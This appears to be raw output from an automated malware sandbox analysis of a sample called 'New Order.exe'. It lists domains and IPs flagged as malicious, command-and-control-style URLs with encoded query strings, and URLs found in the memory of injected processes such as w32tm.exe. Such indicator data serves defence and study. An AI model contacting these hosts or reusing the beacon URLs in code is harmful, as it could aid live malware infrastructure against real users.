                http://www.gravendeel.studio/7hhj/?u6nP_F48=d0CkvoX3wOjxIpsVGuv5CbpRWXdSS5jyTLOcAowQzGd7pP90T+NzeFPfjsupmGVcOHZBRLveV16iOhBmsp+LB4tn4np0Uy/CwiS3uOlrNEAyxbwQ0Bx5UgKfq4kfjh/tx9U3UfI=&F8S0G=ul80rPhxFlR8lH0%Avira URL Cloudsafe
                http://www.beythome.online/8l49/0%Avira URL Cloudsafe
                http://www.funnystory.online/cgi-sys/suspendedpage.cgi?F8S0G=ul80rPhxFlR8lH&amp;u6nP_F48=dzHZVdeA6r60%Avira URL Cloudsafe
                http://www.bootleggersrt.online/7a5n/?F8S0G=ul80rPhxFlR8lH&u6nP_F48=S6SHGGXXYwmAu16pai4DUvmkZVlUR2XiLpaLWC7pZkuSLECp9ozWQ9UIc1yk4ybjQU73M8zKwnu8ByEcz6/kZr88F4N+VuUzEk15V8/AegthLE/UMwpBwzbtc6DqGvxT1O3KEY4=0%Avira URL Cloudsafe
                http://www.beythome.online/8l49/?u6nP_F48=nvcb/0GPN54d2JGc++8p3dyReVT22F4rjpMi4BWXcGVVoAh+NvljRHAQbHtQixLLlmtkfcmDaBBvdXdVxLFdqzx8TquVI3FC1FmB8VJ2JKjVM5x76R9HEtDUYFAgHCOmYLPQQCg=&F8S0G=ul80rPhxFlR8lH0%Avira URL Cloudsafe
                http://www.614genetics.online/614_Genetics_Online_Activity.cfm?fp=GPZqom54Zw2OunBTGjv%2BCiwC4YcGWNmE0%Avira URL Cloudsafe
                http://www.inspireto.life/odi0/0%Avira URL Cloudsafe
                http://www.614genetics.online/__media__/design/underconstructionnotice.php?d=614genetics.online0%Avira URL Cloudsafe
                http://www.614genetics.online0%Avira URL Cloudsafe
                http://www.gravendeel.studio/7hhj/0%Avira URL Cloudsafe
                http://www.kvsj.net/z5bv/0%Avira URL Cloudsafe
                http://www.614genetics.online/614_Genetics_Online_Course.cfm?fp=GPZqom54Zw2OunBTGjv%2BCiwC4YcGWNmE%20%Avira URL Cloudsafe
                http://www.hm35s.top/tb3j/0%Avira URL Cloudsafe
                http://www.funnystory.online/cgi-sys/suspendedpage.cgi?F8S0G=ul80rPhxFlR8lH&u6nP_F48=dzHZVdeA6r6aBY0%Avira URL Cloudsafe
                http://www.614genetics.online/__media__/js/trademark.php?d=614genetics.online&type=ns0%Avira URL Cloudsafe
                http://www.inspireto.life/odi0/?F8S0G=ul80rPhxFlR8lH&u6nP_F48=A+TCtTOt1m7L0JkN7P72xqDuM3MJ0JKhh3i5FsNa0NmBZ9+GiOsXSm+4Udvcs/rcS+RMYR73IEQXFVaqqwbxWOBmPh+KTHFpnfkytlUBUFCYYxG0fJp40sWrzXdCUwp6RCE3NBU=0%Avira URL Cloudsafe
                http://www.jijievo.site/k6jo/0%Avira URL Cloudsafe
                http://www.kvsj.net/z5bv/?u6nP_F48=cvqi6aS93HIxTV+im7Da9wWvrF3f6kX831gUtjTv5ZY+kxOTwbTgT7fbXvvVwY5eJbST1YhYPLKkRqd0ELEj3LZc91hb0mGUNuPi7mwbOhhaZQnJVaKvflcbWzyST/JxwAq3b9E=&F8S0G=ul80rPhxFlR8lH0%Avira URL Cloudsafe
                http://www.conseilnsaftogo.org0%Avira URL Cloudsafe
                http://www.aiactor.xyz/ni8v/?u6nP_F48=E6dmM5lVsU5dMvoO4DByNQl1po9CAiKqwP/M9Lkf/Pz1vXYNvQEcepUiklJu8ucCjCBb2PxhMpGrlWRQjEXW3F39dXh33B934veeKulAqM3yo8/KKg/OIuvEV/M85G2BQAfVVnY=&F8S0G=ul80rPhxFlR8lH0%Avira URL Cloudsafe
                http://www.614genetics.online/614_Genetics_Online_Game.cfm?fp=GPZqom54Zw2OunBTGjv%2BCiwC4YcGWNmE%2Fe0%Avira URL Cloudsafe
                http://www.conseilnsaftogo.org/j7q9/0%Avira URL Cloudsafe
                http://www.614genetics.online/n3sn/?u6nP_F48=RfKXbkttwVfKfWhPTrA3UJfHAa0lqotu1/Ih4u/jCz+IVopDYjbPUryKgNOP1Jh4fKEyHC4SaeJpkkGXoxNgwDh8y8hzLkYWybtZWLt0K3r82a9qd0enmdThBea8SuX4gW/lNzc=&F8S0G=ul80rPhxFlR8lH0%Avira URL Cloudsafe
                http://www.614genetics.online/n3sn/0%Avira URL Cloudsafe
                http://www.funnystory.online/plyd/?F8S0G=ul80rPhxFlR8lH&u6nP_F48=dzHZVdeA6r6aBY+WJKlD1JvNcS8At/hTBiY50HAPZV2ofm/GZqXRfQPKYRVLRkTR3sVHjl53Bmiktifh36yAEsVj1orjw3l3xM5ELiir5eYKE6CYAoGwQn3hI9wO6DC6wMKZTnE=0%Avira URL Cloudsafe
                http://www.funnystory.online/plyd/0%Avira URL Cloudsafe
                http://www.614genetics.online/Genetics_Online_College_Course.cfm?fp=GPZqom54Zw2OunBTGjv%2BCiwC4YcGWN0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                all.wjscdn.com
                154.90.35.240
                truetrue
                  unknown
                  www.lgdiamonds.info
                  130.185.109.77
                  truetrue
                    unknown
                    www.inspireto.life
                    162.0.213.94
                    truetrue
                      unknown
                      funnystory.online
                      172.104.82.74
                      truetrue
                        unknown
                        gravendeel.studio
                        172.104.18.233
                        truetrue
                          unknown
                          conseilnsaftogo.org
                          154.70.82.246
                          truetrue
                            unknown
                            natroredirect.natrocdn.com
                            85.159.66.93
                            truefalse
                              high
                              www.aiactor.xyz
                              13.248.169.48
                              truetrue
                                unknown
                                www.kvsj.net
                                173.236.199.97
                                truetrue
                                  unknown
                                  hm35s.top
                                  154.23.184.95
                                  truetrue
                                    unknown
                                    www.bootleggersrt.online
                                    31.31.196.17
                                    truetrue
                                      unknown
                                      www.614genetics.online
                                      208.91.197.27
                                      truetrue
                                        unknown
                                        www.717hy.net
                                        68.66.226.92
                                        truetrue
                                          unknown
                                          www.theressome123ppl.info
                                          unknown
                                          unknownfalse
                                            unknown
                                            www.jijievo.site
                                            unknown
                                            unknownfalse
                                              unknown
                                              www.gravendeel.studio
                                              unknown
                                              unknownfalse
                                                unknown
                                                www.funnystory.online
                                                unknown
                                                unknownfalse
                                                  unknown
                                                  www.beythome.online
                                                  unknown
                                                  unknownfalse
                                                    unknown
                                                    www.hm35s.top
                                                    unknown
                                                    unknownfalse
                                                      unknown
                                                      www.conseilnsaftogo.org
                                                      unknown
                                                      unknownfalse
                                                        unknown
                                                        NameMaliciousAntivirus DetectionReputation
                                                        http://www.lgdiamonds.info/q2b2/?u6nP_F48=k8LEnfe2wzSPKnd+4j+FHsRof8pP0SbHpdiozyXUU8wG1G+DI2HbB69btAHUx0UZtSY5up0HFKX7joYW5N4IdT0eHsdsbM4tAcjV6Y0GGqKWlvaVbVOKX21NPAfOVONObcqqhCU=&F8S0G=ul80rPhxFlR8lHtrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.717hy.net/ffyl/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.717hy.net/ffyl/?u6nP_F48=E0w2q4MWRkFX7XJTCFHtBeMrFLWo0m25Rc1Iug5umE0SqvxIQJbSqlJsxR0jPeALC0qf+EILQRQVRMVyHOYHvE1WYG6fPKkQNyF776m1LEnS8hs9By21ThuVAZMLKVLgjh2k5HE=&F8S0G=ul80rPhxFlR8lHtrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.beythome.online/8l49/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.gravendeel.studio/7hhj/?u6nP_F48=d0CkvoX3wOjxIpsVGuv5CbpRWXdSS5jyTLOcAowQzGd7pP90T+NzeFPfjsupmGVcOHZBRLveV16iOhBmsp+LB4tn4np0Uy/CwiS3uOlrNEAyxbwQ0Bx5UgKfq4kfjh/tx9U3UfI=&F8S0G=ul80rPhxFlR8lHtrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.bootleggersrt.online/7a5n/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.lgdiamonds.info/q2b2/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.beythome.online/8l49/?u6nP_F48=nvcb/0GPN54d2JGc++8p3dyReVT22F4rjpMi4BWXcGVVoAh+NvljRHAQbHtQixLLlmtkfcmDaBBvdXdVxLFdqzx8TquVI3FC1FmB8VJ2JKjVM5x76R9HEtDUYFAgHCOmYLPQQCg=&F8S0G=ul80rPhxFlR8lHtrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.bootleggersrt.online/7a5n/?F8S0G=ul80rPhxFlR8lH&u6nP_F48=S6SHGGXXYwmAu16pai4DUvmkZVlUR2XiLpaLWC7pZkuSLECp9ozWQ9UIc1yk4ybjQU73M8zKwnu8ByEcz6/kZr88F4N+VuUzEk15V8/AegthLE/UMwpBwzbtc6DqGvxT1O3KEY4=true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.gravendeel.studio/7hhj/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.inspireto.life/odi0/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.kvsj.net/z5bv/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.hm35s.top/tb3j/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.jijievo.site/k6jo/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.inspireto.life/odi0/?F8S0G=ul80rPhxFlR8lH&u6nP_F48=A+TCtTOt1m7L0JkN7P72xqDuM3MJ0JKhh3i5FsNa0NmBZ9+GiOsXSm+4Udvcs/rcS+RMYR73IEQXFVaqqwbxWOBmPh+KTHFpnfkytlUBUFCYYxG0fJp40sWrzXdCUwp6RCE3NBU=true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.kvsj.net/z5bv/?u6nP_F48=cvqi6aS93HIxTV+im7Da9wWvrF3f6kX831gUtjTv5ZY+kxOTwbTgT7fbXvvVwY5eJbST1YhYPLKkRqd0ELEj3LZc91hb0mGUNuPi7mwbOhhaZQnJVaKvflcbWzyST/JxwAq3b9E=&F8S0G=ul80rPhxFlR8lHtrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.conseilnsaftogo.org/j7q9/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.aiactor.xyz/ni8v/?u6nP_F48=E6dmM5lVsU5dMvoO4DByNQl1po9CAiKqwP/M9Lkf/Pz1vXYNvQEcepUiklJu8ucCjCBb2PxhMpGrlWRQjEXW3F39dXh33B934veeKulAqM3yo8/KKg/OIuvEV/M85G2BQAfVVnY=&F8S0G=ul80rPhxFlR8lHtrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.614genetics.online/n3sn/?u6nP_F48=RfKXbkttwVfKfWhPTrA3UJfHAa0lqotu1/Ih4u/jCz+IVopDYjbPUryKgNOP1Jh4fKEyHC4SaeJpkkGXoxNgwDh8y8hzLkYWybtZWLt0K3r82a9qd0enmdThBea8SuX4gW/lNzc=&F8S0G=ul80rPhxFlR8lHtrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.funnystory.online/plyd/?F8S0G=ul80rPhxFlR8lH&u6nP_F48=dzHZVdeA6r6aBY+WJKlD1JvNcS8At/hTBiY50HAPZV2ofm/GZqXRfQPKYRVLRkTR3sVHjl53Bmiktifh36yAEsVj1orjw3l3xM5ELiir5eYKE6CYAoGwQn3hI9wO6DC6wMKZTnE=true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.614genetics.online/n3sn/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.funnystory.online/plyd/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://duckduckgo.com/chrome_newtabw32tm.exe, 0000000E.00000002.4637534779.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffw32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            high
                                                            https://dts.gnpge.comXVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              high
                                                              https://duckduckgo.com/ac/?q=w32tm.exe, 0000000E.00000002.4637534779.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.614genetics.online/614_Genetics_Online_Class.cfm?fp=GPZqom54Zw2OunBTGjv%2BCiwC4YcGWNmE%2Fw32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://i3.cdn-image.com/__media__/pics/28903/search.png)w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  high
                                                                  https://cdn.consentmanager.netw32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    high
                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=w32tm.exe, 0000000E.00000002.4637534779.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.funnystory.online/cgi-sys/suspendedpage.cgi?F8S0G=ul80rPhxFlR8lH&amp;u6nP_F48=dzHZVdeA6r6w32tm.exe, 0000000E.00000002.4635164547.00000000046F0000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003B70000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.614genetics.online/display.cfmw32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfw32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        high
                                                                        http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgw32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          high
                                                                          http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            high
                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchw32tm.exe, 0000000E.00000002.4637534779.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfw32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                high
                                                                                http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixw32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.614genetics.online/__media__/design/underconstructionnotice.php?d=614genetics.onlinew32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.614genetics.online/614_Genetics_Online_Activity.cfm?fp=GPZqom54Zw2OunBTGjv%2BCiwC4YcGWNmEw32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.614genetics.online/614_Genetics_Online_Course.cfm?fp=GPZqom54Zw2OunBTGjv%2BCiwC4YcGWNmE%2w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssw32tm.exe, 0000000E.00000002.4635164547.00000000040A8000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003528000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameNew Order.exe, 00000001.00000002.2168677711.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.614genetics.onlinew32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotw32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://delivery.consentmanager.netw32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldw32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://i3.cdn-image.com/__media__/pics/29590/bg1.png)w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotw32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://www.614genetics.online/__media__/js/trademark.php?d=614genetics.online&type=nsw32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woffw32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.funnystory.online/cgi-sys/suspendedpage.cgi?F8S0G=ul80rPhxFlR8lH&u6nP_F48=dzHZVdeA6r6aBYw32tm.exe, 0000000E.00000002.4635164547.00000000046F0000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003B70000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=w32tm.exe, 0000000E.00000002.4637534779.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixw32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.conseilnsaftogo.orgXVZmwHdSYwx.exe, 00000011.00000002.4636187188.00000000052B9000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://www.ecosia.org/newtab/w32tm.exe, 0000000E.00000002.4637534779.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpgw32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://ac.ecosia.org/autocomplete?q=w32tm.exe, 0000000E.00000002.4637534779.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfw32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfw32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularw32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.614genetics.online/614_Genetics_Online_Game.cfm?fp=GPZqom54Zw2OunBTGjv%2BCiwC4YcGWNmE%2Few32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      http://localhost/arkanoid_server/requests.phpw32tm.exe, 0000000E.00000002.4635164547.000000000399C000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000002E1C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.2797262924.0000000028B5C000.00000004.80000000.00040000.00000000.sdmp, New Order.exefalse
                                                                                                                        high
                                                                                                                        http://www.614genetics.online/Genetics_Online_College_Course.cfm?fp=GPZqom54Zw2OunBTGjv%2BCiwC4YcGWNw32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://i3.cdn-image.com/__media__/js/min.js?v2.3w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=w32tm.exe, 0000000E.00000002.4637534779.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            • No. of IPs < 25%
                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                            • 75% < No. of IPs
                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                            130.185.109.77
                                                                                                                            www.lgdiamonds.infoGermany
                                                                                                                            51191XIRRADEtrue
                                                                                                                            13.248.169.48
                                                                                                                            www.aiactor.xyzUnited States
                                                                                                                            16509AMAZON-02UStrue
                                                                                                                            162.0.213.94
                                                                                                                            www.inspireto.lifeCanada
                                                                                                                            35893ACPCAtrue
